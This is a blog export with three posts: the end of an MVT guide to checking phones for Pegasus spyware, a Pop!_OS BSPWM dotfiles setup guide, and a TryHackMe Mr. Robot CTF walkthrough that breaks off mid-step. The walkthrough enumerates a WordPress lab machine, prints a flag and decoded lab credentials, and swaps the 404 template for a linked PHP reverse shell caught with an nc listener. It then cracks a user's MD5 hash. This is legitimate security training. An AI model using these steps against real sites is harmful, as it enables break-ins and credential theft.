The important folder is the folder named after the UDID (a folder named 0000 [REDACTED]).\nDecrypting backup: # If you have encrypted your backup, let\u0026rsquo;s transfer it to a computer or virtual machine with Linux (in this example, I will move the file from USB to the Documents folder); then we need to create a folder for the decrypted backup:\nmkdir ~/Documents/decrypted Now we decrypt the backup:\nmvt-ios decrypt-backup -p \u0026#39;YOUR_PASSWORD\u0026#39; -d ~/Documents/decrypted ~/Documents/0000[REDACTED] This command will take a long time, depending on the size of the backup. Once the decryption is complete, it\u0026rsquo;s time to make an output folder:\nmkdir ~/Downloads/output_forensics After that, we are left with only one command that will perform a scan using a stix2 file and check whether the iPhone is infected with Pegasus or not.\nmvt-ios check-backup -i ~/Downloads/investigations/2021-07-18_nso/pegasus.stix2 -o ~/Downloads/output_forensics ~/Documents/decrypted Digital forensics on Android devices # Digital forensics on Android devices is much more complicated; MVT currently provides two methods.\nBy downloading and analyzing the APK files that are installed. By extracting Android backups and checking for suspicious SMS messages. APK file check # To use the MVT option mvt-android, your Android device needs to be connected to the Linux machine. You will need to turn on the USB debugging option on your phone.\nOn the first connection, you will have to confirm the connection on the Android device; then, on Linux, we can create an output folder:\nmkdir ~/Downloads/output_forensics You can then run the following command:\nmvt-android download-apks -o ~/Downloads/output_forensics You can optionally look up the SHA256 hashes of the extracted APKs on VirusTotal. This can help identify malicious APK files (applications) on your Android device. 
We do this with the command:\nmvt-android download-apks -o ~/Downloads/output_forensics --virustotal Checking for malicious SMS messages # This method uses the MVT to check whether your Android device has received malicious SMS messages. I assume you have already connected your device as in the instructions for APK files; now we run this command:\nadb backup com.android.providers.telephony We need to approve the backup on your phone and potentially enter your backup password. The backup will then be stored in a file called backup.ab.\nThen we need to use Android Backup Extractor to convert the previously obtained file into a readable format. Java must be installed on the system!\nThen run the following commands:\njava -jar ~/Downloads/abe.jar unpack backup.ab backup.tar tar xvf backup.tar Android Backup Extractor will ask you for the password if the backup is encrypted.\nThen MVT checks whether malicious links are in SMS messages; we do it with the command:\nmvt-android check-backup -o sms . Using the --iocs or -i option, we can specify the IOCs file.\nWhich files does mvt-ios create and then check? # After the MVT has finished analysing, the terminal will print a Warning (suspicious file) if your device is infected with Pegasus. You will now see all the files that MVT has created and checked during the analysis.\n💵 [cache_files.json]\nThis JSON file is created by the CacheFiles module. The module extracts records from all SQLite database files named Cache.db that are saved on the disk. These databases usually contain data from iOS Internal URL caching.\nYou can use this module to see HTTP requests and responses. This is useful because we can see HTTP requests that are part of the \u0026ldquo;exploitation chain\u0026rdquo;, in which an iOS service tries to download a malicious file during the first phase.\n📱 [calls.json]\nThis JSON file is created by the Calls module. 
The module extracts records from the SQLite database located at /private/var/mobile/Library/CallHistoryDB/CallHistory.storedata, which contains a list of all incoming and outgoing calls, including calls from applications such as WhatsApp or Skype.\n💻 [chrome_favicon.json]\nThis JSON file is created by the ChromeFavicon module. The module extracts records from the SQLite database located at /private/var/mobile/Containers/Data/Application/*/Library/Application Support/Google/Chrome/Default/Favicons, which serves to save favicons (small icons in your web browser tabs) for faster loading.\nFavicons can be hacked; you can see more about this topic at LINK.\n💻 [chrome_history.json]\nThis JSON file is created by the ChromeHistory module. The module extracts records from the SQLite database located at /private/var/mobile/Containers/Data/Application/*/Library/Application Support/Google/Chrome/Default/History, which contains your Google Chrome web browser history.\n🤓 [contacts.json]\nThis JSON file is created by the Contacts module. The module extracts records from the SQLite database located at /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb, which contains a list of your contacts.\n🦊 [firefox_favicon.json]\nThe FirefoxFavicon module created this JSON file. The module extracts records from the SQLite database located at /private/var/mobile/profile.profile/browser.db, which serves to save favicons (small icons in your web browser\u0026rsquo;s tabs) for faster loading.\n🦊 [firefox_history.json]\nThe FirefoxHistory module created this JSON file. The module extracts records from the SQLite database located at /private/var/mobile/profile.profile/browser.db, which contains your Firefox web browser history.\n📋 [id_status_cache.json]\nThis JSON file is created by the IDStatusCache module. 
The module extracts records from the plist file located at /private/var/mobile/Library/Preferences/com.apple.identityservices.idstatuscache.plist, which saves your Apple ID samples (this includes biometrics like Touch and Face ID).\n🤝 [interaction_c.json]\nThis JSON file is created by the InteractionC module. The module extracts records from the SQLite database located at /private/var/mobile/Library/CoreDuet/People/interactionC.db, which contains details about user interactions with installed applications.\n📍 [locationd_clients.json]\nThis JSON file is created by the LocationdClients module. The module extracts records from the plist file located at /private/var/mobile/Library/Caches/locationd/clients.plist, which contains a cache of applications that requested access to location services.\n🔷 [manifest.json]\nThe Manifest module created this JSON file. The module extracts records from the SQLite Manifest.db database created by iTunes during the backup, which serves to tell the local backup where all the files are on the iOS device.\n💽 [datausage.json]\nThis JSON file is created by the Datausage module. The module extracts records from the SQLite database located at /private/var/wireless/Library/Databases/DataUsage.sqlite. It contains the history of data usage by the processes used on the system.\n💻 [safari_browser_state.json]\nThis JSON file is created by the SafariBrowserState module. The module extracts records from SQLite databases located at /private/var/mobile/Library/Safari/BrowserState.db or /private/var/mobile/Containers/Data/Application/*/Library/Safari/BrowserState.db, which contain a list of open tabs in the Safari web browser.\n💻 [safari_favicon.json]\nThis JSON file is created by the SafariFavicon module. 
The module extracts records from SQLite databases located at /private/var/mobile/Library/Image Cache/Favicons/Favicons.db or /private/var/mobile/Containers/Data/Application/*/Library/Image Cache/Favicons/Favicons.db, which serve to save favicons (small icons in the tabs of your web browser) for faster loading.\n🔥 [safari_history.json]\nThis JSON file is created by the SafariHistory module. The module extracts records from SQLite databases located at /private/var/mobile/Library/Safari/History.db or /private/var/mobile/Containers/Data/Application/*/Library/Safari/History.db, which contain search history.\n📝 [sms.json]\nThis JSON file is created by the SMS module. The module extracts a list of SMS messages containing HTTP links from the SQLite database located at /private/var/mobile/Library/SMS/sms.db.\n📝 [sms_attachments.json]\nThis JSON file is created by the SMSAttachments module. The module extracts details about attachments sent by SMS or iMessage from the same database used by the SMS module.\n📜 [version_history.json]\nThis JSON file is created by the IOSVersionHistory module. The module extracts iOS update records from the analytics list files located at /private/var/db/analyticsd/Analytics-Journal-*.ips.\n🕸️ [webkit_indexeddb.json]\nThis JSON file is created by the WebkitIndexedDB module. The module extracts a list of files and folders located in /private/var/mobile/Containers/Data/Application/*/Library/WebKit/WebsiteData/IndexedDB, which contains IndexedDB files created by any application.\n🕸️ [webkit_local_storage.json]\nThis JSON file is created by the WebkitLocalStorage module. The module extracts a list of file and folder names found in /private/var/mobile/Containers/Data/Application/*/Library/WebKit/WebsiteData/LocalStorage/, which contains files from internal storage created by any application.\n🕸️ [webkit_safari_view_service.json]\nThis JSON file is created by the WebkitSafariViewService module. 
The module extracts a list of file and folder names found in /private/var/mobile/Containers/Data/Application/*/SystemData/com.apple.SafariViewService/Library/WebKit/WebsiteData/, which contains files cached by SafariViewService.\n🕸️ [webkit_session_resource_log.json]\nThis JSON file is created by the WebkitSessionResourceLog module. The module extracts records from plist files named full_browsing_session_resourceLog.plist, which contain records of resources loaded from various web pages visited.\n📞 [whatsapp.json]\nThis JSON file was created by the WhatsApp module. The module extracts a list of WhatsApp messages containing HTTP links from the SQLite database located at /private/var/mobile/Containers/Shared/AppGroup/*/ChatStorage.sqlite.\nConclusion # Pegasus is one of the most dangerous tools for espionage. I disagree with the actions of the NSO Group company, and I think everyone has the right to privacy. Currently, the only protection against Pegasus might be a phone that is neither Android nor iOS. A good alternative is the Nokia 8110 4G with GerdaOS operating system. I recommend watching The Guardian\u0026rsquo;s interview with Edward Snowden on the subject of Pegasus.\nThank you for your time 💙 # ","date":"21 July 2021","permalink":"/blog/nso-pegasus-spyware/","section":"Blogs","summary":"🔍 NSO Pegasus Spyware 🔍 What is Pegasus Spyware? # Over the weekend, news leaked that several authoritarian governments (including Mexico, Morocco and the UAE) used spying software developed by the Israeli company NSO Group.","title":"NSO Pegasus Spyware"},{"content":"","date":"21 July 2021","permalink":"/categories/privacy/","section":"Categories","summary":"","title":"Privacy"},{"content":" 🖥️ Pop! Linux configuration files 🖥️ These are my current dotfiles of Pop! 
Linux distribution OS.\nThe installation will help you create the same look as in the pictures; here are the step-by-step instructions.\nSystem specifications:\nOS: Pop!_OS WM: BSPWM Keyboard Daemon: Sxhkd Bar: Polybar Compositor: Picom App Launcher: Rofi Terminal: Alacritty Shell: Oh-my-ZSH Shell theme: Powerlevel10k Text Editor: Vim-Airline Lockscreen: Slim and Slimlock Notifications: Dunst GTK Theme: Nordic_Dark Icon Theme: Flatery_Dark Cursor Theme: Oreo_Blue Font: Source_Code_Pro Browser: Firefox Browser Theme: Minimal_Functional_Fox Installation # To start making this look, I assume you have a freshly installed Pop! OS.\nIf you are interested in what an application does, the Wikipedia section will help you.\nRepository upgrade and system upgrade # sudo apt update sudo apt upgrade Installation of BSPWM Tiling Window Manager # First, we need to install a few so-called dependencies that we need to proceed with the installation.\nInstallation of required dependencies: sudo apt install build-essential git vim xcb libxcb-util0-dev libxcb-ewmh-dev libxcb-randr0-dev libxcb-icccm4-dev libxcb-keysyms1-dev libxcb-xinerama0-dev libasound2-dev libxcb-xtest0-dev libxcb-shape0-dev Repository cloning: cd ~/Downloads git clone https://github.com/baskerville/bspwm.git Compiling and installing BSPWM: cd bspwm make sudo make install Copy BSPWM configuration files: mkdir ~/.config/bspwm cp examples/bspwmrc ~/.config/bspwm chmod +x ~/.config/bspwm/bspwmrc cd .. Installation of keyboard daemon # To use keyboard shortcuts, for example to open a terminal or another application, we must use a so-called keyboard daemon. 
It is a process that runs in the background and instructs BSPWM Tiling Window Manager what to do if someone presses a specific shortcut on the keyboard.\nIf you are interested in what a shortcut does according to my settings, the shortcut section will help you.\nRepository cloning: cd ~/Downloads git clone https://github.com/baskerville/sxhkd.git Compiling and installing sxhkd: cd sxhkd make sudo make install Copy sxhkd configuration files: mkdir ~/.config/sxhkd cp ../bspwm/examples/sxhkdrc ~/.config/sxhkd cd .. NOTE: If you change anything in the sxhkdrc file, pay attention to which terminal is set; if you are using the regular Pop!_OS terminal, you need to change the command under the terminal emulator entry to gnome-terminal. Installation of Polybar # Installation of required dependencies: sudo apt install cmake cmake-data pkg-config python3-sphinx libcairo2-dev libxcb1-dev libxcb-util0-dev libxcb-randr0-dev libxcb-composite0-dev python3-xcbgen xcb-proto libxcb-image0-dev libxcb-ewmh-dev libxcb-icccm4-dev libxcb-xkb-dev libxcb-xrm-dev libxcb-cursor-dev libasound2-dev libpulse-dev libjsoncpp-dev libmpdclient-dev libcurl4-openssl-dev libnl-genl-3-dev Repository cloning: cd ~/Downloads git clone --recursive https://github.com/polybar/polybar Compilation and installation of polybar: cd polybar mkdir build cd build cmake .. make -j$(nproc) sudo make install Installation of Picom # Installation of required dependencies: sudo apt install meson libxext-dev libxcb1-dev libxcb-damage0-dev libxcb-xfixes0-dev libxcb-shape0-dev libxcb-render-util0-dev libxcb-render0-dev libxcb-randr0-dev libxcb-composite0-dev libxcb-image0-dev libxcb-present-dev libxcb-xinerama0-dev libpixman-1-dev libdbus-1-dev libconfig-dev libgl1-mesa-dev libpcre2-dev libevdev-dev uthash-dev libev-dev libx11-xcb-dev Repository cloning: cd ~/Downloads git clone https://github.com/ibhagwan/picom.git Making picom with Ninja: cd picom git submodule update --init --recursive meson --buildtype=release . 
build ninja -C build Installation of picom compositor: sudo ninja -C build install cd .. Installation of Rofi # sudo apt install rofi Installation of Alacritty terminal # sudo apt install alacritty Cloning this repository: cd ~/Downloads git clone https://github.com/lukapiplica/dots.git Setting up an alacritty theme: mkdir ~/.config/alacritty cp dots/alacritty/alacritty.yml ~/.config/alacritty/ NOTE: If you get error: GLSL 3.30 is not supported, do this: sudo nano /usr/share/applications/com.alacritty.Alacritty.desktop Change Exec=alacritty into Exec=bash -c \u0026quot;LIBGL_ALWAYS_SOFTWARE=1 alacritty\u0026quot;.\nNOTE: After this step, you are ready to log in to BSPWM; first, you need to log out of the current desktop interface; then, click on the ⚙️ icon in the lower right corner and select BSPWM. Installation of fonts # cd ~/Downloads cd dots sudo cp -r Source_Code_Pro /usr/share/fonts fc-cache -v Setting the wallpaper # Installation of Feh program: sudo apt install feh Moving wallpapers: mkdir ~/Wall cp -r ~/Downloads/dots/Wallpapers/ ~/Wall Setting the wallpaper: echo \u0026#39;feh --bg-fill $HOME/Downloads/dots/Wallpapers/wallpaper2.jpeg\u0026#39; \u0026gt;\u0026gt; ~/.config/bspwm/bspwmrc Configuration of polybar # mkdir ~/.config/polybar cd ~/Downloads/dots/polybar cp * -r ~/.config/polybar echo \u0026#39;~/.config/polybar/./launch.sh\u0026#39; \u0026gt;\u0026gt; ~/.config/bspwm/bspwmrc cd fonts sudo cp * /usr/share/fonts/truetype/ Installation of Oh-My-ZSH # sudo apt install zsh sh -c \u0026#34;$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)\u0026#34; Installation of Powerlevel10k # Repository cloning: git clone --depth=1 https://github.com/romkatv/powerlevel10k.git ${ZSH_CUSTOM:-$HOME/.oh-my-zsh/custom}/themes/powerlevel10k After cloning, we have to set this theme in the ~/.zshrc file; we do this by putting the following line in the .zshrc file: ZSH_THEME=\u0026quot;powerlevel10k/powerlevel10k\u0026quot;\nWe type in the terminal:\np10k 
configure Then we follow the instructions in the terminal to make the theme we want.\nInstallation of Vim theme # mkdir -p ~/.vim/colors cd ~/Downloads cp dots/nord.vim ~/.vim/colors Cloning a Vim Airline theme: cd ~/Downloads git clone https://github.com/vim-airline/vim-airline.git cd vim-airline cp * -r ~/.vim echo \u0026#39;colorscheme nord\u0026#39; \u0026gt;\u0026gt; ~/.vimrc echo \u0026#34;let g:airline_theme=\u0026#39;base16\u0026#39;\u0026#34; \u0026gt;\u0026gt; ~/.vimrc Setting up rofi theme # mkdir -p ~/.config/rofi/themes cp ~/Downloads/dots/nord.rasi ~/.config/rofi/themes rofi-theme-selector Rofi Theme Selector will show us some of the themes. To select our theme, go to the Nord theme and press Enter; then, to set it permanently, press Alt + a. nano ~/.config/sxhkd/sxhkdrc This opens the nano text editor in the terminal, and we have to change dmenu to rofi -show drun. Installation of Slim and Slimlock # sudo apt install slim libpam0g-dev libxrandr-dev libfreetype6-dev libimlib2-dev libxft-dev sudo dpkg-reconfigure gdm3 Note: If we get a menu, we have to choose Slim as an option. 
To set the theme: cd ~/Downloads/dots sudo cp slim.conf /etc \u0026amp;\u0026amp; sudo cp slimlock.conf /etc sudo cp default /usr/share/slim/themes Various tools # We have successfully achieved the look of this operating system; now, we are installing several programs from the pictures.\nInstallation of tty-clock # sudo apt-get install tty-clock Installation of CAVA Audio Visualizer # sudo add-apt-repository ppa:hsheth2/ppa sudo apt-get update sudo apt-get install cava Installation of htop # sudo apt-get install htop Installation of cmatrix # sudo apt-get install cmatrix Installation of sxiv # sudo apt-get install sxiv Installation of Ranger # sudo apt-get install ranger Installation of pfetch # cd ~/Downloads git clone https://github.com/dylanaraps/pfetch.git sudo install pfetch/pfetch /usr/local/bin/ ls -l /usr/local/bin/pfetch Installation of chafa # cd ~/Downloads git clone https://github.com/hpjansson/chafa.git cd chafa ./autogen.sh make sudo make install Installation of snake game # sudo apt install python3-pip python3 -m pip install -U pygame --user cd ~/Downloads git clone https://github.com/Unixado/Snake.git cd Snake python src/game.py Installation of lollypop # sudo add-apt-repository ppa:gnumdk/lollypop sudo apt install lollypop Installation of Minimal Functional Fox # sh -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/mut-ex/minimal-functional-fox/master/install.sh)\u0026#34; Set up a Firefox theme cp -r ~/Downloads/dots/.firefoxthemes ~/ Then open Firefox and go to preferences, then to Home and where it says Homepage and new windows we select Custom URLs ..., below we write this: file:///home/*YOUR USERNAME*/.firefoxthemes/startpage/Startpage/index.html Restart Firefox Installation of GTK Theme # Installation of Lxappearance # sudo apt-get install lxappearance Installation of Nordic Dark theme # Theme link: https://www.gnome-look.org/p/1267246/ Download the zip file, extract it and insert it in Lxappearance.\nInstallation of Flattery Dark 
theme for icons # Theme link: https://www.gnome-look.org/s/Gnome/p/1332404 Download the zip file, extract it and insert it in Lxappearance.\nInstallation of Oreo Blue cursor theme # Theme link: https://www.gnome-look.org/s/Gnome/p/1360254/ Download the zip file, extract it and insert it in Lxappearance.\nWikipedia # Once we have made this BSPWM configuration, it is time to clarify what each application does. Within the ~/.config/ directory you can find all the files you need to run BSPWM.\n🧠 [BSPWM]\nBSPWM is a tiling window manager that, unlike other desktop interfaces, each new window opens according to an algorithm.\nIf we have, for example, two windows, they will be open in full screen, and they cannot be located one over the other, such as in Windows or GNOME interfaces. Theoretically, it effectively uses the space on the screen so that the entire screen is filled. If we run out of space on the first desktop, we can switch to the second desktop using the keyboard shortcut or mouse and continue using this operating system.\n⌨️ [SXHKD]\nSXHKD is a keyboard daemon. It works for us as a background process and tells BSPWM which application to open if the user presses a specific shortcut on the keyboard.\n🍫 [Polybar]\nPolybar is our status bar at the top of our desktop.\nIt serves us to display notifications, date and time, internet, battery, shutdown and restart menu of the operating system and most important workspaces from BSPWM.\n📚 [Picom]\nPicom is a compositor; it serves us as a process that sets rounded edges on every application we open.\n🤓 [Rofi]\nRofi is a process that opens up other applications, most helpful in running GTK applications (user interface applications).\n💻 [Alacritty] terminal.\nAlacritty serves as a terminal emulator, i.e. 
a replacement for the standard GNOME terminal.\nWe use it mainly because it gives us the ability to achieve better looks by editing its config files.\n🐚 [Oh-My-ZSH] shell.\nOh-My-ZSH is a framework that makes it easier for us to manage ZSH configurations.\nIn this case, it is mostly used to add topics to a terminal that has a ZSH shell.\nZSH (Zshell) was chosen because it is newer, and most of the updates from other Linux distributions are already moving to it compared to Bash shell.\nWe used the Powerlevel10k configuration to set the themes. 📋 [Vim] text editor\nAs many people use notepad on Windows operating systems, we use nano and Vim.\nThe Nano text editor is much easier to use, while the Vim is made more for developers because of its shortcuts.\nVim Airline is a theme that gives us a different look than a regular Vim. 📺 [Slim] lockscreen\nSlim is our lock screen.\nSlimlock is the theme that we used for the lock screen.\n💬 [Dunst] notifications.\nDunst is a process that runs in the background, and its primary purpose is to display notifications on the status bar (Polybar).\nThe advantage of dunst is that it provides the ability to code themes for appearance and many other functions such as. 
Which notifications to display, etc.\n🕶️ [Nordic Dark] GTK theme.\nNordic Dark is a GTK theme (theme for user interface applications) that gives us a dark look at applications with a user interface.\n🔷 [Flattery Dark] icon theme.\nThe name itself says that applications with a user interface mostly have icons that we can click with the mouse; this theme gives us a different look to the icons.\n🔵 [Oreo Blue] cursor theme.\nThis theme gives us a blue cursor look, it was inserted just for the looks and because it matches all the other colours of this operating system.\n🔤 [Source Code Pro] font.\nFont of this operating system.\n🔥🦊 [Firefox] web browser.\nI use Firefox because it is one of the best privacy-oriented web browsers, in my opinion.\n🦊 [Minimal Functional Fox] firefox theme.\nThis topic is here mainly for appearance but also because it is minimal.\n⏰ tty-clock\nTty-clock is an application that has the purpose of showing the time and date in the terminal.\n🎚️ CAVA audio visualizer.\nCava is our application that serves as an audio visualizer.\n📈 HTop\nThe HTop application shows which processors are currently running and how much RAM they are taking in, and many other things. 
Think of HTop as a Task Manager in the Windows operating system.\n😎 CMatrix\nCMatrix is an application that is here just for looks, and its purpose is to print some text in an open terminal that aims to give a display of hacking from the Matrix movie.\n🖼️ SXIV\nSXIV is an image viewer application that is an application that opens images to us.\n🤠 Ranger\nRanger is an application that allows us to see and access all files on the computer in the terminal.\n🗄️ Pfetch\nThe purpose of the Pfetch application is to show which operating system we use, which laptop/computer we have, which is the current version of the kernel, how much uptime we currently have, how many packets we have and how much RAM we have.\n⚙️ Chafa\nChafa is an application that prints an image to use in the terminal, thus achieving a retro/ASCII look of an image.\n🐍 Snake\nIn this case, the Snake app is an old snake game from the Nokia 3310 phone that has been slightly modified in terms of colours and is adapted to be played in the terminal.\n🍭 Lollypop\nLollypop is a music app, we play songs through it.\nShortcuts # As super we use the Windows key on the keyboard. 
Super is the most important key on our keyboard because we use it to give instructions to the SXHKD keyboard daemon.\nKeyboard # Keys Action super + enter Opens terminal super + space Opens Rofi through which we open GTK applications super + escape Reloads SXHKD and its configuration files super + alt + r Restarts the BSPWM Tiling Window Manager super + w Closes the current application super + [1-0] Changes the current workspace super + g Swaps the current, smaller window into the area of the larger window, and puts the larger window in the position of the smaller one super + m Opens the application across the entire desktop super + [h,j,k,l] Moves focus to another window super + alt + [h,j,k,l] Moves the windows outward super + alt + shift + [h,j,k,l] Moves the windows inwards super + s Puts windows in the so-called float mode, an option where we can put a window on top of another window as in Windows operating systems super + ctrl + [arrow keys] Moves the float windows Thank you for your time 💙 # ","date":"19 July 2021","permalink":"/blog/pop-os-nordic/","section":"Blogs","summary":"🖥️ Pop! Linux configuration files 🖥️ These are my current dotfiles of Pop! Linux distribution OS.\nThe installation will help you create the same look like the pictures; here are the step-by-step instructions.","title":"[BSPWM] Pop OS Nordic"},{"content":" 🤖 TryHackMe Mr. Robot CTF 🤖 Can we hack Mr. Robot CTF? This virtual machine is rated medium and will teach us many useful things.\nThe instructions will help achieve the same answers; there are step-by-step instructions.\nUsed programs:\nOpenVPN NMAP GoBuster Netcat Instructions # To start hacking this virtual machine, we must first connect to TryHackMe OpenVPN and run the machine in Task 2.\nI assume your local virtual machine runs the Kali Linux operating system.\nEstablishing a connection via OpenVPN # First, we need to download the OpenVPN file that TryHackMe gives you. 
Then open a terminal in the directory where you downloaded the OpenVPN file. The connection is made using:\nsudo openvpn *NAME_OF_YOUR_FILE*.ovpn Network enumeration # First, we need to look at which ports are open. The more we know about the system, the better. In this case, we use Nmap to scan the network.\nNmap scan # kali@kali:~/Desktop$ nmap *IP_ADDRESS* -A Result of Nmap scan # kali@kali:-/Desktop$ nmap 10.10.51.194 -A Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-23 18:35 CEST Nmap scan report for 10.10.38.44 Host is up (0.095s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: Site doesn\u0026#39;t have a title (text/html). 443/tcp open ssl/http Apache httpd |_http-server-header: Apache |_http-title: Site doesn\u0026#39;t have a title (text/html). | ssl-cert: Subject: commonName=www.example.com | Not valid before: 2015-09-16T10:45:03 |_Not valid after: 2025-09-13T10:45:03 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 34.90 seconds As we can see, we have port 80 open which tells us that this is a website on the HTTP protocol.\nInstallation of seclists # sudo apt install seclists After this command seclists will be installed in the /usr/share/seclists/ directory.\nDirectory enumeration on a web server using gobuster # kali@kali:~/Desktop$ gobuster dir -u http://10.10.51.194/ -w /usr/share/seclists/Discovery/Web-Content/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.51.194/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/05/23 18:27:45 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 213] /.htaccess (Status: 403) [Size: 218] /.htpasswd (Status: 403) [Size: 218] /0 (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/0/] /Image (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/Image/] /admin (Status: 301) [Size: 234] [--\u0026gt; http://10.10.51.194/admin/] /atom (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/atom/] /audio (Status: 301) [Size: 234] [--\u0026gt; http://10.10.51.194/audio/] /blog (Status: 301) [Size: 233] [--\u0026gt; http://10.10.51.194/blog/] /css (Status: 301) [Size: 232] [--\u0026gt; http://10.10.51.194/css/] /dashboard (Status: 302) [Size: 0] [--\u0026gt; http://10.10.51.194/wp-admin/] /favicon.ico (Status: 200) [Size: 0] /feed (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/] /images (Status: 301) [Size: 235] [--\u0026gt; http://10.10.51.194/images/] /image (Status: 301) [Size: 0] [--\u0026gt; 
http://10.10.51.194/image/] /index.php (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/] /index.html (Status: 200) [Size: 1188] /js (Status: 301) [Size: 231] [--\u0026gt; http://10.10.51.194/js/] /intro (Status: 200) [Size: 516314] /license (Status: 200) [Size: 309] /login (Status: 302) [Size: 0] [--\u0026gt; http://10.10.51.194/wp-login.php] /page1 (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/] /phpmyadmin (Status: 403) [Size: 94] /readme (Status: 200) [Size: 64] /rdf (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/rdf/] /robots (Status: 200) [Size: 41] /robots.txt (Status: 200) [Size: 41] /rss (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/] /rss2 (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/] /sitemap (Status: 200) [Size: 0] /sitemap.xml (Status: 200) [Size: 0] /video (Status: 301) [Size: 234] [--\u0026gt; http://10.10.51.194/video/] /wp-admin (Status: 301) [Size: 237] [--\u0026gt; http://10.10.51.194/wp-admin/] /wp-content (Status: 301) [Size: 239] [--\u0026gt; http://10.10.51.194/wp-content/] /wp-config (Status: 200) [Size: 0] /wp-includes (Status: 301) [Size: 240] [--\u0026gt; http://10.10.51.194/wp-includes/] /wp-cron (Status: 200) [Size: 0] /wp-links-opml (Status: 200) [Size: 227] /wp-load (Status: 200) [Size: 0] /wp-login (Status: 200) [Size: 2606] /wp-mail (Status: 500) [Size: 3064] /wp-settings (Status: 500) [Size: 0] /wp-signup (Status: 302) [Size: 0] [--\u0026gt; http://10.10.51.194/wp-login.php?action=register] /xmlrpc (Status: 405) [Size:42] =============================================================== 2021/05/23 18:40:33 Finished =============================================================== Finding the first key # After enumeration, we can see more directories located on this web server. If we look at the TryHackMe hint for the first key, we can see that our hint is robots.txt. I guess this hint and the /robots directory are related. 
Besides them, I\u0026rsquo;m interested in /wp-login; I think it\u0026rsquo;s WordPress.\nEntering the page Enter the obtained IP address into your web browser:\nBut if we append /robots.txt to our link (IP_ADDRESS/robots.txt), we can see that it reveals the first key, which is in .txt format.\nWe found two files, one fsociety.dic and key-1-of-3.txt. The first file looks like a dictionary file.\nDownloading the first key # We can see the first key by entering the page (http://IP_ADDRESS/key-1-of-3.txt), but we can also download it using the curl command.\ncurl -s http://IP_ADDRESS/key-1-of-3.txt Result # kali@kali:~/Desktop$ curl -s http://10.10.51.194/key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9 First key: 073403c8a58a1f80d943455fb30724b9\nFinding the second key # HINT: White coloured text.\nIf we go back to gobuster, we can see that we had WordPress directories. I am specifically interested in:\n/login (Status: 302) /wp-content (Status: 301) /admin (Status: 301) /wp-login (Status: 200) /license (Status: 200) /wp-includes (Status: 301) As we can see, the /license directory returns status 200. Status 200 tells us that the page is active. Curl is our best friend in this case.\nCurl command # curl -s http://IP_ADDRESS/license | tr -d \u0026#34;\\n\u0026#34; Result # kali@kali:~/Desktop$ curl -s http://10.10.51.194/license | tr -d \u0026#34;\\n\u0026#34; what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?do you want a password or something? 
ZWxsaW90OkVSMjgtMDY1Mgo= The specific text ZWxsaW90OkVSMjgtMDY1Mgo= looks like base64.\nDecoding Base64 # The command we will use is:\necho \u0026#34;ZWxsaW90OkVSMjgtMDY1Mgo=\u0026#34; | base64 -d Base64 decoding result # kali@kali:~/Desktop$ echo \u0026#34;ZWxsaW90OkVSMjgtMDY1Mgo=\u0026#34; | base64 -d elliot:ER28-0652 We got the username and password, I guess, for WordPress.\nInteresting fact: The code is a reference to Elliot\u0026rsquo;s number from the identification card at work and appears in the series. WordPress enumeration # It\u0026rsquo;s time to try to sign in to WordPress:\nThe first step is to go to:\nhttp://IP_ADDRESS/wp-login After logging in, we immediately see in the lower-left corner of the page that the WordPress version is 4.3.1. This is an old version of WordPress.\nWe find two users, of which Elliot (us) is the administrator.\nWe can see that this old version of WordPress is vulnerable to a PHP reverse shell. LINK OF THE SCRIPT Since we are an administrator, we need to go to Appearance.\nWe have to replace the code of the 404 PHP template with the script.\nNote: Pay attention to the IP address in the code; here, we have the local IP address, i.e. the IP address of our computer. We can check the local IP address with ifconfig. PHP reverse shell via netcat # After we have replaced the code and changed the IP address in the script, we will run Netcat on the port through which the script establishes a connection to us. We do this with the following command:\nnc -nlvp 1234 After that, we have to open the link http://IP_ADDRESS/404.php in the web browser.\nAs we can see, we opened the shell in the terminal. Netcat got the connection.\nWe will now check which files are in the /home/robot directory. 
We do this with the command:\nls -l /home/robot We now know the location of the second key:\n$ ls -l /home/robot total 8 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5 The problem is that we are not the robot user on this machine at all. We check this with the whoami command.\n$ whoami daemon The only file we can read is password.raw-md5. Let\u0026rsquo;s see what\u0026rsquo;s in this file.\n$ cat /home/robot/password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b Cracking MD5 Hash # It\u0026rsquo;s an MD5 hash. A hash is a one-way mathematical function: its output cannot be turned back into the input. This is good for storing passwords, but MD5 is an old algorithm and easy to crack.\nWe will first look at whether this hash can be cracked online to save time. LINK As we can see on the link above, it can. The password is abcdefghijklmnopqrstuvwxyz\nNow we need to log in as the robot user. We do this with the following command:\nsu - robot But there is a problem:\n$ su - robot su: must be run from a terminal Python shell # This can be fixed with Python. First, we need to check if Python is installed at all.\n$ which python /usr/bin/python Let\u0026rsquo;s make a shell with Python. 
